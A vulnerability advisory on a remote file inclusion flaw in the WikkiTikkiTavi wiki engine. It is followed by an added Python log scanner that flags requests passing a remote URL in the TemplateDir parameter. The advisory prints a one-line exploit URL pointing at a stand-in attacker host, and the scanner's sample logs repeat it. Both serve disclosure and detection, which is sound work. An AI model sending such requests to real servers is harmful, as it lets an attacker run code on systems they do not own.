source: https://www.securityfocus.com/bid/3946/info
WikkiTikkiTavi is a freely available engine for running a Wiki site. Wiki sites are web communities which are based on the idea that every webpage is editable by users of the website. WikkiTikkiTavi is back-ended by a MySQL database and runs on most Linux and Unix variants, as well as Microsoft Windows NT/2000 operating systems.
WikkiTikkiTavi permits remote file inclusion. As a result, a remote attacker may include an arbitrary file located on a remote host. This may be exploited via a malicious web request. If this file is a PHP script, it will be executed on the host running the vulnerable software with the privileges of the webserver.
The attacker may use this as an opportunity to gain local access on the host running the vulnerable software.
The following URL is sufficient to exploit this issue:
http://some.host/wikihome/action/conflict.php?TemplateDir=http://my.host/
where conflict.php is the name of the malicious attacker-supplied script.
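As an added defender-side example, not part of the advisory or of WikkiTikkiTavi itself: a Python check that scans web server access logs for requests passing a remote URL in the TemplateDir parameter, the request pattern described above. The log lines are constructed for the example, and the combined-log format and parameter name TemplateDir are assumed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format access log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [20/Jan/2002:10:15:01 +0000] "GET /wikihome/action/conflict.php?TemplateDir=http://my.host/ HTTP/1.0" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [20/Jan/2002:10:15:07 +0000] "GET /wikihome/action/conflict.php?TemplateDir=HTTP%3A%2F%2Fmy.host%2F HTTP/1.0" 200 512 "-" "Mozilla/4.0"
198.51.100.7 - - [20/Jan/2002:10:16:30 +0000] "GET /wikihome/action/conflict.php?TemplateDir=templates HTTP/1.0" 200 4096 "-" "Mozilla/4.0"
198.51.100.7 - - [20/Jan/2002:10:17:02 +0000] "GET /wikihome/index.php?action=edit&page=HomePage HTTP/1.0" 200 2048 "-" "Mozilla/4.0"
"""

# ip, timestamp, method, request target and status from a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# URL schemes that PHP's include() fetches from a remote host when allow_url_fopen is on.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def is_remote_include_value(value: str) -> bool:
    """True if a query value names a remote host. The scheme check is case-insensitive,
    and the value is decoded once more to catch double-encoded attempts."""
    decoded = unquote(value).strip().lower()
    return decoded.startswith(REMOTE_SCHEMES)


def find_rfi_attempts(log_text: str, watched_params=("TemplateDir",)):
    """Return (ip, script, param, value) for each request that passes a remote URL
    in one of the watched parameters; parse_qs already URL-decodes each value once."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        for param, values in parse_qs(url.query, keep_blank_values=True).items():
            if param not in watched_params:
                continue
            for value in values:
                if is_remote_include_value(value):
                    hits.append((m.group("ip"), url.path, param, value))
    return hits


if __name__ == "__main__":
    for ip, script, param, value in find_rfi_attempts(SAMPLE_LOG):
        print(f"RFI attempt from {ip}: {script} {param}={value}")
```

The same check extends to any other include-path parameter by adding its name to watched_params; values that resolve only to local directory names, such as "templates" above, are not flagged.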